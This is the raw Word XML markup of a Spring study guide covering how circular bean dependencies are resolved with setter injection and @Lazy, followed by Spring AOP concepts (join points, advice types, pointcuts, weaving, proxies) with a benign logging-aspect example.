    <w:p w14:paraId="1BF8AA56" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAB68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3E7207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A(A a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D4CF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232DB33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2B40541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DE5CDE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In this case, Spring first creates the instances of A and B, and then injects the required dependencies into them using the setter methods. This allows Spring to break the circular dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54197D9F"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Using @Lazy annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, you can use the @Lazy annotation on one of the dependencies to make Spring instantiate it lazily, thereby avoiding the circular dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5210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70071A5"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7147CAA"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FF68AA"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0C5F129C"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36599DC6"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7068A2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Lazy B b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDB542"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7A4F715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4BB80E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384BF7CE"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556E58ED"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55653B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BD56DBD"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5DFCD98"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15DF0335"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8ACA9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1289ED0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Lazy A a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5055E80C"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0AB40667"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766626E"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DDAD49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 @Lazy annotation tells Spring to instantiate the B bean only when it is needed, breaking the immediate circular reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1AEC16"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Resolving Circular Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E00798"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Avoid Constructor Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for circular dependencies. Use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Field Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for circular references, as Spring can inject the dependencies after both beans are created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9038F3"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation to defer the initialization of one of the dependent beans, allowing Spring to break the cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E576E1"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E5CD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E4B95"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37" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="547F1718" w14:textId="275305B5" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD6436">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>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901804F" w14:textId="314366CA" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD6436" w:rsidP="00CD6436">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="_Toc197867683"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring AOP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p w14:paraId="2F298B78" w14:textId="77777777" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD6436" w:rsidP="00CD6436">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FEB586C"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0" w:name="_Toc197867684"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is AOP in Spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="470"/>
    </w:p>
    <w:p w14:paraId="54C9E42B" w14:textId="14F582E2" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE"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Concepts of AOP in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962CBD2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E31E58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 Point</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53A06B"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is a point during the execution of a program, such as method execution, where an aspect can be applied. In Spring AOP, the most common join points are method calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053E033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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370EF0E2"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dvice is the action that is taken at a specific join point. It is the actual code that is executed when the aspect is applied. There are several types of advice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533BF102"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3D99AA93"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the outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B31A2DE"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returns successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A41F3D7"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if the method throws an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F346D19"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nd can control whether the method executes or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A4ACB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32245179"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pointcut is an expression that matches certain join points. It defines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the advice should be applied (e.g., which methods or classes). Pointcuts are often defined using annotations or expressions like execution(), within(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36564F06"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Weaving</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822584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eaving is the process of applying aspects to the target objects. Spring AOP performs weaving at runtime, unlike other AOP frameworks like AspectJ, which can perform weaving at compile-time or load-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A126A8"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How AOP Works in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6954E1D5"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e an Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You create an aspect that contains one or more advices (logic you want to apply) and a pointcut expression (where to apply it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78688A4F"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pply Aspect to Target</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring’s AOP proxy applies the aspect to the target class based on the pointcut expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8EE20C"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ecute Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the target method is invoked, the corresponding advice runs at the specified join points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D82CF2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Types of AOP in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E531C56"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roxy-based AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4572D60D"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AOP is usually implemented using </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDK dynamic proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CGLIB proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. JDK proxies are used when the target object implements an interface, while CGLIB proxies are used for non-interface-based classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A7D26"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Spring AOP uses </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning that the aspect is applied dynamically when the method is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EFFF23"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J-based AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B9D82"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 of AOP in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B8C73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1. Define an Aspect (Advice &amp; Pointcut)</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF341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703D34BC"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771CF1D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public class LoggingAspect {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C772538" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DB93E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expression: matches all methods in the "service" package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC61ED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3E993BB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1795157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4D64D68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08725FB" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC8CA5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fter advice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107B31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F6D5A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31446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27A9DF5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AEA1580" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4147A3D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round advice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746669B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round("execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F28B2B"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Object logAround(ProceedingJoinPoint joinPoint) throws Throwable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1A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before method execution: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A25C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Object result = joinPoint.proceed();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78088A6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after method execution: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1767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return result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A9B2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8BF24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07FA3D5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2. Enable AspectJ Auto Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In your Spring configuration, enable AspectJ support by adding the following annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260F5CF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nfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E31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nableAspectJAutoProxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7FC07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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C06CEF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Configuration for beans, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E0B9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34F1BA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3. Apply the Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is how your Spring components would look like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE4F5A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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B066ED"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UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28695D7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D33E0D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addUser(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A44A76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dding user: " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7602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7F909F7E" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A43911E"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deleteUser(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D231EE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Deleting user: " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765C9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6FE928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4F48446C"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When to Use AOP in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2275B4F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To add logging functionality before or after method execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ACE18B"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Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automatically handle transactions around method executions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B555B9A"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curity</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To enforce security checks on certain methods or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7EF12"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aching</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Add caching logic before or after method calls to improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B745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rror Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Catch exceptions and add error handling functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FBB9B4"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enefits of AOP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250FDE6C"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paration of Concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: AOP allows you to keep business logic separate from cross-cutting concerns like logging, transactions, and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD49944"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ode Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Common functionality can be reused across multiple methods or classes without duplicating the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308C336"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asier Maintenance</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the cross-cutting concerns are modularized into aspects, they can be managed and modified independently of business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7235ABAE"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0833D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AOP in Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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38" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7A25F"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1" w:name="_Toc197867685"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are JoinPoint, Advice, Pointcut, and Aspect?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p w14:paraId="383D47B7" w14:textId="7E36200B" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring AOP (Aspect-Oriented Programming)</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are the key concepts that enable the separation of cross-cutting concerns and modularization of aspects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F50077"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JoinPoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F9106"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a point during the execution of the program, such as method execution, where an aspect can be applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B6B13"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the context of Spring AOP, a join point usually refers to a method execution, and it provides information about the method that is being invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16176DDB"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xamples of join points are method calls, method executions, or even field access (though field access is not supported in Spring AOP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDE15A5"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used to provide details about the method that is being advised, such as the method name, parameters, and target object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F11F6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A4F7331" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1946"/>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could be when a method in a service class is invoked, and an aspect (like logging) is applied to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2502C311"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Advice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760239B7"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is the action taken at a particular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It is the actual code that is executed when the aspect is applied to a join point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D19D1"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re are several types of advice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8435FA"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4D17837F"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whether the method succeeded or failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1C8A83"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execution, only if the method completes without throwing an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FA823B"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after the method execution, only if the method throws an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C62E594"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1848526" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1948"/>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 advice will run before the actual method starts executing, and @After advice will run after the method execution ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F4B48E"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DBF9CC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Before(JoinPoint joinPoint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF5B6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 + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91A2A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1D18E736"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3. Pointcut:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6ACBAC"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defines the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when</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an advice should be applied. It is an expression that matches certain join points (methods) where the advice will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F146326"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s are used to specify which methods or classes are targeted by the advice. Pointcut expressions are often written in AspectJ expression language, such as execution(), within(), args(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2C5E3A"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 pointcut is essentially a filter that determines which methods should be intercepted and advised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27C476"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79A8EA8F" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1950"/>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pointcut expression like execution(* com.example.service.*.*(..)) targets all methods within the com.example.service package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B6E5A"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execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63055D0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serviceMethods() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCE58F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definition (no implementation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A38C96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F92AEE3"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4. Aspect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BFEB9"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n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is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modularized</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit of cross-cutting functionality in an application. It combines th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and th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defines how the advice should be applied at the specified join points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7377EB40"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An aspect is a class annotated with @Aspect, and it typically contains one or more advices and pointcuts.</w:t>
      </w:r>
    </w:p>
